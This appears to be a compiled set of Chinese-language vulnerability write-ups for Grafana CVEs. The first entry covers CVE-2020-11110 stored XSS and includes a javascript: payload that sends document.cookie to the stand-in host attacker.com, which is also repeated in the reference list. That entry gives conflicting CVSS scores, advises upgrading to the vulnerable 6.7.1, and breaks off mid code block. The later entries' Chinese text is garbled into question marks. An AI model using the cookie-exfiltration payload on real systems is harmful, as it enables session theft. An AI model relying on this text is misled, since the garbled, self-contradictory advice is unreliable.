一、漏洞简介¶

1.1 漏洞背景¶

2020 年 4 月，Grafana 团队发布版本 6.7.2，修复了一个影响所有 6.7.1 及更早版本的存储型跨站脚本（XSS）漏洞。该漏洞存在于 Grafana 的仪表板快照（Dashboard Snapshot）功能中，允许攻击者通过注入恶意 JavaScript 代码来窃取用户信息或执行未授权操作。

重要背景： - 仪表板快照是 Grafana 的一个功能，允许用户共享仪表板的静态副本 - 快照可以保存到本地或上传到外部服务（如 raintank.io） - 该功能需要 Viewer 及以上权限才能创建快照

1.2 漏洞概述（包含 CVE 编号、危害等级、漏洞类型、披露时间等）¶

项目	内容
漏洞编号	CVE-2020-11110
危害等级	MEDIUM / 5.4
漏洞类型	存储型 XSS 漏洞
披露时间	2020-07-27
影响组件	Grafana

CVE编号：CVE-2020-11110
危害等级：中等（Moderate）
CVSS评分：6.1（Medium）
CVSS向量：CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
漏洞类型：跨站脚本（Cross-Site Scripting, XSS）- CWE-79
影响组件：仪表板快照 originalUrl 参数处理模块
攻击复杂度：低
所需权限：Viewer 权限
用户交互：需要用户点击链接

漏洞描述： Grafana 6.7.1 及更早版本在处理仪表板快照的 originalUrl 字段时，未对用户输入进行充分的过滤和编码。攻击者可以通过创建包含恶意 JavaScript 的仪表板快照，当其他用户查看该快照并点击"Open Original Dashboard"按钮时，恶意代码将被执行。

补充核验信息：公开时间：2020-07-27；NVD 评分：5.4（MEDIUM）；CWE：CWE-79。

二、影响范围¶

2.1 受影响的版本¶

受影响版本： - Grafana 6.7.1 及所有更早版本 - 具体范围：Grafana <= 6.7.1

受影响配置： - 启用了仪表板快照功能的 Grafana 实例 - 允许 Viewer 及以上权限用户创建快照

2.2 不受影响的版本¶

已修复版本： - Grafana 6.7.2 及以上版本 - Grafana 7.x 及以上版本

2.3 触发条件（如特定模块、特定配置、特定运行环境等）¶

必要条件：
运行受影响版本的 Grafana
攻击者拥有 Viewer 或更高权限
受害者访问包含恶意快照的链接
受害者点击"Open Original Dashboard"按钮
攻击场景：
内部协作环境中，攻击者创建包含 XSS 的快照并分享给同事
公开快照服务上托管的恶意快照
通过社交工程诱导用户点击恶意链接

三、漏洞详情与原理解析¶

3.1 漏洞触发机制¶

攻击流程：

创建快照：
攻击者登录 Grafana（需要 Viewer 权限）
创建一个仪表板快照
使用代理工具（如 Burp Suite）拦截请求
修改 originalUrl 参数，注入恶意 JavaScript
注入恶意代码： javascript // 恶意 originalUrl 示例 javascript:alert(document.cookie) // 或更复杂的攻击载荷 javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)
触发 XSS：
其他用户访问快照链接
用户点击"Open Original Dashboard"按钮
恶意 JavaScript 在用户浏览器上下文中执行

3.2 源码层面的根因分析（结合源码与补丁对比）¶

漏洞代码位置：前端模板渲染逻辑

漏洞代码示例（修复前）：

// 前端模板代码（简化）
<div class="snapshot-header">
  <a ng-href="{{snapshot.originalUrl}}" class="btn btn-primary">
    Open Original Dashboard
  </a>
</div>

问题分析：

未验证 URL 协议：
代码未检查 originalUrl 是否为合法的 HTTP/HTTPS URL
允许 javascript: 协议，导致代码执行
后端未充分过滤： ```go

四、漏洞复现（可选）¶

4.1 环境搭建¶

暂无公开可验证复现信息。

4.2 PoC 演示与测试过程¶

暂无公开可验证复现信息。

五、修复建议与缓解措施¶

5.1 官方版本升级建议¶

优先升级到 6.7.1 或同等后续安全版本。
升级前请结合官方发布说明确认兼容性与回滚方案。

5.2 临时缓解方案（如修改配置文件、关闭相关模块、增加 WAF 规则等）¶

对可回显内容执行严格转义与输出编码，并审查富文本或模板渲染点。
在前端和反向代理层补充 CSP、输入校验与告警监控。

六、参考信息 / 参考链接¶

6.1 官方安全通告¶

https://github.com/grafana/grafana/blob/master/CHANGELOG.md

6.2 其他技术参考资料¶

NVD：https://nvd.nist.gov/vuln/detail/CVE-2020-11110
CVE：https://www.cve.org/CVERecord?id=CVE-2020-11110
https://github.com/grafana/grafana/blob/master/CHANGELOG.md
https://security.netapp.com/advisory/ntap-20200810-0002/
https://attacker.com/steal?cookie='+document.cookie

<hr />

Grafana ???????CVE-2018-15727?¶

??????¶

1.1 ????¶

Grafana ???????????? CVE-2018-15727 ??????????????????????? CRITICAL?CVSS 9.8?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2018-15727
????	CRITICAL
CVSS ??	9.8
????	CWE-287
????	2018-08-29
????	Grafana

??????¶

2.1 ??????¶

grafana:grafana:*, >= 2.0.0, <= 2.1.2
grafana:grafana:*, >= 3.0.0, <= 3.1.1
grafana:grafana:*, >= 4.0.0, < 4.6.4
grafana:grafana:*, >= 5.0.0, < 5.2.3
redhat:ceph_storage:3.0

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

????????????????????????
?????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????Grafana 2.x, 3.x, and 4.x before 4.6.4 and 5.x before 5.2.3 allows authentication bypass because an attacker can generate a valid "remember me" cookie knowing only a username of an LDAP or OAuth user.
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-287?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2018-15727
https://www.cve.org/CVERecord?id=CVE-2018-15727
http://www.securityfocus.com/bid/105184
https://access.redhat.com/errata/RHSA-2018:3829
https://access.redhat.com/errata/RHSA-2019:0019
https://grafana.com/blog/2018/08/29/grafana-5.2.3-and-4.6.4-released-with-important-security-fix/

<hr />

Grafana ???????CVE-2020-27846?¶

??????¶

1.1 ????¶

Grafana ???????????? CVE-2020-27846 ??????????????????????? CRITICAL?CVSS 9.8?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2020-27846
????	CRITICAL
CVSS ??	9.8
????	CWE-115
????	2020-12-21
????	Grafana

??????¶

2.1 ??????¶

grafana:grafana:*, < 6.7.5
grafana:grafana:*, >= 7.0.0, < 7.2.3
grafana:grafana:*, >= 7.3.0, < 7.3.6
saml_project:saml:*, < 0.4.3
redhat:openshift_container_platform:3.11
redhat:openshift_container_platform:4.0
redhat:openshift_service_mesh:2.0
redhat:enterprise_linux:8.0

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

????????????????????????
?????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????A signature verification vulnerability exists in crewjam/saml. This flaw allows an attacker to bypass SAML Authentication. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-115?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2020-27846
https://www.cve.org/CVERecord?id=CVE-2020-27846
https://bugzilla.redhat.com/show_bug.cgi?id=1907670
https://github.com/crewjam/saml/security/advisories/GHSA-4hq8-gmxx-h6w9
https://grafana.com/blog/2020/12/17/grafana-6.7.5-7.2.3-and-7.3.6-released-with-important-security-fix-for-grafana-enterprise/
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3YUTKIRWT6TWU7DS6GF3EOANVQBFQZYI/
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ICP3YRY2VUCNCF2VFUSK77ZMRIC77FEM/
https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/

<hr />

Grafana Grafana Authentication Bypass Vulnerability?CVE-2021-39226?¶

??????¶

1.1 ????¶

Grafana ???????????? CVE-2021-39226 ??????????????????????? CRITICAL?CVSS 9.8???? CISA KEV ?????

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2021-39226
????	CRITICAL
CVSS ??	9.8
????	CWE-287?CWE-862
????	2021-10-05
????	Grafana
CISA KEV	???
KEV ????	Grafana Authentication Bypass Vulnerability
KEV ????	2022-09-15

??????¶

2.1 ??????¶

grafana:grafana:*, < 7.5.11
grafana:grafana:*, >= 8.0.0, < 8.1.6
fedoraproject:fedora:34
fedoraproject:fedora:35

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

????????????????????????
?????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????Grafana is an open source data visualization platform. In affected versions unauthenticated and authenticated users are able to view the snapshot with the lowest database key by accessing the literal paths: /dashboard/snapshot/:key, or /api/snapshots/:key. If the snapshot "public_mode" configuration setting is set t...
?????? CISA KEV ???????????????????????????????

3.2 ????????????????????¶

?????????????CWE-287?CWE-862?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2021-39226
https://www.cve.org/CVERecord?id=CVE-2021-39226
https://www.cisa.gov/known-exploited-vulnerabilities-catalog
http://www.openwall.com/lists/oss-security/2021/10/05/4
https://github.com/grafana/grafana/commit/2d456a6375855364d098ede379438bf7f0667269
https://github.com/grafana/grafana/security/advisories/GHSA-69j6-29vr-p3j9
https://grafana.com/docs/grafana/latest/release-notes/release-notes-7-5-11/
https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-1-6/

<hr />

Grafana ???????CVE-2022-26148?¶

??????¶

1.1 ????¶

Grafana ???????????? CVE-2022-26148 ??????????????????????? CRITICAL?CVSS 9.8?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2022-26148
????	CRITICAL
CVSS ??	9.8
????	CWE-312
????	2022-03-21
????	Grafana

??????¶

2.1 ??????¶

grafana:grafana:*, <= 7.3.4
redhat:ceph_storage:3.0
redhat:ceph_storage:4.0
redhat:ceph_storage:5.0
redhat:storage:3.0

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

????????????????????????
?????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????An issue was discovered in Grafana through 7.3.4, when integrated with Zabbix. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to disco...
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-312?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2022-26148
https://www.cve.org/CVERecord?id=CVE-2022-26148
https://2k8.org/post-319.html
https://security.netapp.com/advisory/ntap-20220425-0005/

<hr />

Grafana ???????CVE-2022-28660?¶

??????¶

1.1 ????¶

Grafana ???????????? CVE-2022-28660 ??????????????????????? CRITICAL?CVSS 9.8?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2022-28660
????	CRITICAL
CVSS ??	9.8
????	CWE-306
????	2022-05-20
????	Grafana

??????¶

2.1 ??????¶

grafana:grafana:*, >= 1.1.0, < 1.2.1
grafana:grafana:1.3.0

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

????????????????????????
?????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????The querier component in Grafana Enterprise Logs 1.1.x through 1.3.x before 1.4.0 does not require authentication when X-Scope-OrgID is used. Versions 1.2.1, 1.3.1, and 1.4.0 contain the bugfix. This affects -auth.type=enterprise in microservices mode
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-306?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2022-28660
https://www.cve.org/CVERecord?id=CVE-2022-28660
https://grafana.com/docs/enterprise-logs/latest/gel-releases/#v121----may-3-2022
https://security.netapp.com/advisory/ntap-20220707-0004/

<hr />

Grafana ???????CVE-2023-3128?¶

??????¶

1.1 ????¶

Grafana ???????????? CVE-2023-3128 ??????????????????????? CRITICAL?CVSS 9.4?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2023-3128
????	CRITICAL
CVSS ??	9.4
????	CWE-290
????	2023-06-22
????	Grafana

??????¶

2.1 ??????¶

grafana:grafana:*, >= 6.7.0, < 8.5.27
grafana:grafana:*, >= 9.2.0, < 9.2.20
grafana:grafana:*, >= 9.3.0, < 9.3.16
grafana:grafana:*, >= 9.4.0, < 9.4.13
grafana:grafana:*, >= 9.5.0, < 9.5.4

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

????????????????????????
?????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????Grafana is validating Azure AD accounts based on the email claim. On Azure AD, the profile email field is not unique and can be easily modified. This leads to account takeover and authentication bypass when Azure AD OAuth is configured with a multi-tenant app.
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-290?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2023-3128
https://www.cve.org/CVERecord?id=CVE-2023-3128
https://github.com/grafana/bugbounty/security/advisories/GHSA-gxh2-6vvc-rrgp
https://grafana.com/security/security-advisories/cve-2023-3128/
https://security.netapp.com/advisory/ntap-20230714-0004/

<hr />

Grafana ???????CVE-2025-41115?¶

??????¶

1.1 ????¶

Grafana ???????????? CVE-2025-41115 ??????????????????????? CRITICAL?CVSS 10.0?

1.2 ??????? CVE ???????????????????¶

??	??
????	CVE-2025-41115
????	CRITICAL
CVSS ??	10.0
????	CWE-266
????	2025-11-21
????	Grafana

??????¶

2.1 ??????¶

grafana:grafana:*, >= 12.0.0, < 12.2.1

2.2 ???????¶

NVD / CISA ????????????????????????????????????????

2.3 ????????????????????????¶

????????????????????????
?????????????????????????????????????

???????????¶

3.1 ??????¶

NVD ?????SCIM provisioning was introduced in Grafana Enterprise and Grafana Cloud in April to improve how organizations manage users and teams in Grafana by introducing automated user lifecycle management. In Grafana versions 12.x where SCIM provisioning is enabled and configured, a vulnerability in user identity handling al...
??????????????????????????? PoC ???

3.2 ????????????????????¶

?????????????CWE-266?
NVD / CISA ???????????? diff???????????????????????????????

??????????¶

4.1 ????¶

??????????????????????????????????????????

4.2 PoC ???????¶

? CISA KEV ????????????????? KEV ????? PoC?
??????????????????????????????????????????

???????????¶

5.1 ????????¶

???????????????????????????
??????????????????????????????????????

5.2 ????????????????????????????¶

??????????????????????
???????????????????????? WAF ???
????????????????????????????

?????? / ????¶

https://nvd.nist.gov/vuln/detail/CVE-2025-41115
https://www.cve.org/CVERecord?id=CVE-2025-41115
https://grafana.com/security/security-advisories/CVE-2025-41115